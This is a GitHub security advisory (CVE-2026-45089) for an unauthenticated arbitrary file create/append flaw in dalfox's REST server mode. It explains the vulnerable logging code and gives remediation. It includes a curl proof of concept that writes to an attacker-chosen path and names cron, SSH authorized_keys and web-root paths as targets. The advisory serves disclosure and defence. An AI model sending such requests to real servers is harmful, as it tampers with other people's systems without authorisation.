Skip to content

Dalfox Server Mode has an Unauthenticated Arbitrary File Create/Append via `output` Option

High severity GitHub Reviewed Published May 7, 2026 in hahwul/dalfox • Updated May 12, 2026

Package

gomod github.com/hahwul/dalfox/v2 (Go)

Affected versions

<= 2.12.0

Patched versions

2.13.0

Description

Summary

When dalfox is run in REST API server mode, the output, output-all, and debug fields in model.Options are JSON-tagged and deserialized directly from the attacker's request body, then propagated unchanged through dalfox.Initialize into the scan engine's logging path. The logger opens the attacker-supplied path with os.O_APPEND|os.O_CREATE|os.O_WRONLY and writes scan log lines to it. Critically, this file write block lives outside the IsLibrary guard in DalLog, so it executes even in server/library mode where file output was never intended to operate. Because no API key is required in the default configuration, an unauthenticated network caller can create or append to any file writable by the dalfox process on the host filesystem.

Severity

High (CVSS 3.1: 8.2)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L

  • Attack Vector: Network — server binds to 0.0.0.0:6664 by default.
  • Attack Complexity: Low — no preconditions; all trigger options (output, output-all, debug) are fully attacker-supplied in the JSON body.
  • Privileges Required: None — --api-key defaults to "", so the auth middleware is never registered.
  • User Interaction: None.
  • Scope: Unchanged — the file write stays within the dalfox process's OS authority.
  • Confidentiality Impact: None — this is a write-only primitive; no data is returned to the caller.
  • Integrity Impact: High — the attacker has full control over which file path is opened, enabling creation of new files or corruption of existing files anywhere the dalfox process has write permission. While the log content format is semi-fixed, the file path is entirely attacker-determined, making the integrity violation complete with respect to file targeting.
  • Availability Impact: Low — corrupting application configuration files or log files on the host can degrade the availability of other services relying on those files.

Affected Component

  • cmd/server.goinit() (line 51): --api-key defaults to "" — no auth by default
  • pkg/server/server.gosetupEchoServer() (line 68): auth middleware only registered when APIKey != ""
  • pkg/server/server.gopostScanHandler() (lines 173–191): rq.Options (including OutputFile, OutputAll, Debug) passed to ScanFromAPI without sanitization
  • lib/func.goInitialize() (line 107): OutputFile explicitly propagated from caller options; OutputAll (line 167) and Debug (line 176) likewise
  • internal/printing/logger.goDalLog() (lines 230–244): os.OpenFile(options.OutputFile, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) executes outside the IsLibrary guard

CWE

  • CWE-306: Missing Authentication for Critical Function
  • CWE-73: External Control of File Name or Path
  • CWE-434: Unrestricted Upload of File with Dangerous Type (write-path variant)

Description

output, output-all, and debug Are Fully Attacker-Controlled

model.Options exposes all three trigger fields with JSON tags:

// pkg/model/options.go:88,85,88
OutputFile  string `json:"output,omitempty"`
OutputAll   bool   `json:"output-all,omitempty"`
Debug       bool   `json:"debug,omitempty"`

postScanHandler binds the entire Req.Options from the JSON body and passes it directly to ScanFromAPI:

// pkg/server/server.go:173-191
rq := new(Req)
if err := c.Bind(rq); err != nil { ... }
go ScanFromAPI(rq.URL, rq.Options, *options, sid)

Initialize explicitly copies all three fields into newOptions:

// lib/func.go:107, 167, 176
"OutputFile": {&newOptions.OutputFile, options.OutputFile},
...
"OutputAll":  {&newOptions.OutputAll, options.OutputAll},
...
"Debug":      {&newOptions.Debug, options.Debug},

The File Write Is Not Guarded by IsLibrary

Initialize always sets IsLibrary: true (line 20) and Silence: true (line 44) in its returned options — the intent being that the scan engine runs in embedded/library mode during API calls, suppressing terminal I/O. DalLog does respect this for stderr output: lines 203–228 route logs to ScanResult.Logs (not stderr) when IsLibrary is true. However, the file write block at lines 230–244 is positioned after and outside that if-else:

// internal/printing/logger.go
mutex.Lock()
if options.IsLibrary {
    options.ScanResult.Logs = append(options.ScanResult.Logs, text)  // API path
} else {
    // stderr printing (CLI path)
}

// ← file write is here, unconditionally — no IsLibrary check
if options.OutputFile != "" {
    var fdtext string
    if ftext != "" {
        fdtext = ftext
        f, err := os.OpenFile(options.OutputFile,
            os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
        if err != nil {
            fmt.Fprintln(os.Stderr, "output file error (file)")
        }
        defer f.Close()
        if _, err := f.WriteString(fdtext + "\n"); err != nil {
            fmt.Fprintln(os.Stderr, "output file error (write)")
        }
    }
}
mutex.Unlock()

The ftext variable is populated whenever allWrite is true (options.Debug || options.OutputAll). Since both are attacker-supplied, both conditions are trivially satisfied.

What Gets Written

Log lines of the form:

[*] Starting scan [SID:<id>] / URL: <attacker-supplied-url>
[I] Checking BAV
[E] connection refused
[DEBUG] <internal state>
...

The URL appears verbatim in log messages, giving the attacker partial influence over the written content. While the format is not fully arbitrary (fixed prefixes like [*] , [I] , [E] ), the file path is entirely attacker-controlled. The flags O_CREATE (creates the file if absent) and O_APPEND (never truncates) mean the attacker can:

  • Create new files at arbitrary paths
  • Append log content to existing files (corrupting configs, auth files, cron entries if the line happens to match syntax)

No Defense at Any Layer

The same opt-in API key gap applies here as in all prior findings:

// pkg/server/server.go:68-70
if options.ServerType == "rest" && options.APIKey != "" {
    e.Use(apiKeyAuth(options.APIKey, options))
}

There is no path allowlist, no IsLibrary guard on the file write, and no stripping of OutputFile from API-sourced requests anywhere in the codebase.

Proof of Concept

# Step 1 — Start dalfox REST server (default: no API key)
go run . server --host 127.0.0.1 --port 16664 --type rest

# Step 2 — Verify health (unauthenticated)
curl -s http://127.0.0.1:16664/health
# Expected: {"code":200,"msg":"ok"}

# Step 3 — Trigger arbitrary file creation with attacker-controlled path
curl -s -X POST http://127.0.0.1:16664/scan \
  -H 'Content-Type: application/json' \
  --data '{
    "url": "http://127.0.0.1:1/?x=1",
    "options": {
      "output": "/tmp/dalfox_sink_poc.log",
      "output-all": true,
      "debug": true,
      "use-headless": false
    }
  }'

# Step 4 — Verify file was created and written to by the dalfox process
sleep 2
cat /tmp/dalfox_sink_poc.log
# Expected:
# [*] Starting scan [SID:...] / URL: http://127.0.0.1:1/?x=1
# [I] Checking BAV
# [E] ...

No X-API-KEY header is required. Replace /tmp/dalfox_sink_poc.log with any path writable by the dalfox process: /var/www/html/injected.txt, /etc/cron.d/dalfox, ~/.ssh/authorized_keys (appending log lines that won't break key format but pollute the file), etc.

Impact

  • Arbitrary file creation: The attacker can create files at any path on the dalfox host filesystem accessible to the dalfox process, including web-serving directories, cron drop-in directories, and application config directories.
  • Arbitrary file append/corruption: Existing files can have log-format lines appended, degrading parsers that expect strict formats (sshd_config, crontab, /etc/hosts, application config files).
  • Partial content control via URL: The scan target URL appears verbatim in log output; combined with creative path targeting, this may enable injection into certain file formats.
  • No authentication required in the default deployment.
  • When dalfox runs under a privileged account (e.g., in a CI pipeline or as root in a container), the blast radius extends to system-wide files.

Recommended Remediation

Option 1: Strip filesystem-dangerous fields from API-sourced requests (preferred)

Nullify all fields that touch the local filesystem before passing options to ScanFromAPI. This is the same remediation recommended for the found-action RCE and custom-payload-file file-read findings and should be applied as a single consolidated patch:

// pkg/server/server.go — in postScanHandler, before ScanFromAPI:
rq.Options.OutputFile = ""
rq.Options.OutputAll = false          // safe to leave user value; file write is blocked by OutputFile=""
rq.Options.CustomPayloadFile = ""
rq.Options.CustomBlindXSSPayloadFile = ""
rq.Options.FoundAction = ""
rq.Options.FoundActionShell = ""
rq.Options.HarFilePath = ""

Option 2: Guard the file write with IsLibrary in DalLog

Move the OutputFile write block inside the else branch so it only executes in non-library (CLI) mode:

// internal/printing/logger.go — restructure the if-else:
if options.IsLibrary {
    options.ScanResult.Logs = append(options.ScanResult.Logs, text)
} else {
    // existing stderr printing logic...

    // file write belongs here, not after the if-else
    if options.OutputFile != "" && ftext != "" {
        f, err := os.OpenFile(options.OutputFile, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
        ...
    }
}

This fix addresses the root structural cause — the file write was intended for CLI mode only, and gating it on !IsLibrary matches that intent. Option 1 is still recommended as the primary fix; Option 2 adds defence-in-depth but requires care to not break legitimate CLI usage.

Option 3: Require --api-key at server startup

As with the other server-mode findings, making authentication mandatory eliminates the unauthenticated attack surface entirely:

// cmd/server.go — in runServerCmd:
if serverType == "rest" && apiKey == "" {
    fmt.Fprintln(os.Stderr, "ERROR: --api-key is required when running in REST server mode.")
    os.Exit(1)
}

All three options should be applied together.

##Credit

Emmanuel David

Github:- https://github.com/drmingler.

References

@hahwul hahwul published to hahwul/dalfox May 7, 2026
Published to the GitHub Advisory Database May 12, 2026
Reviewed May 12, 2026
Last updated May 12, 2026

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
High
Availability
Low

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(16th percentile)

Weaknesses

External Control of File Name or Path

The product allows user input to control or influence paths or file names that are used in filesystem operations. Learn more on MITRE.

Missing Authentication for Critical Function

The product does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources. Learn more on MITRE.

Unrestricted Upload of File with Dangerous Type

The product allows the upload or transfer of dangerous file types that are automatically processed within its environment. Learn more on MITRE.

CVE ID

CVE-2026-45089

GHSA ID

GHSA-8hf9-3q64-q2qf

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.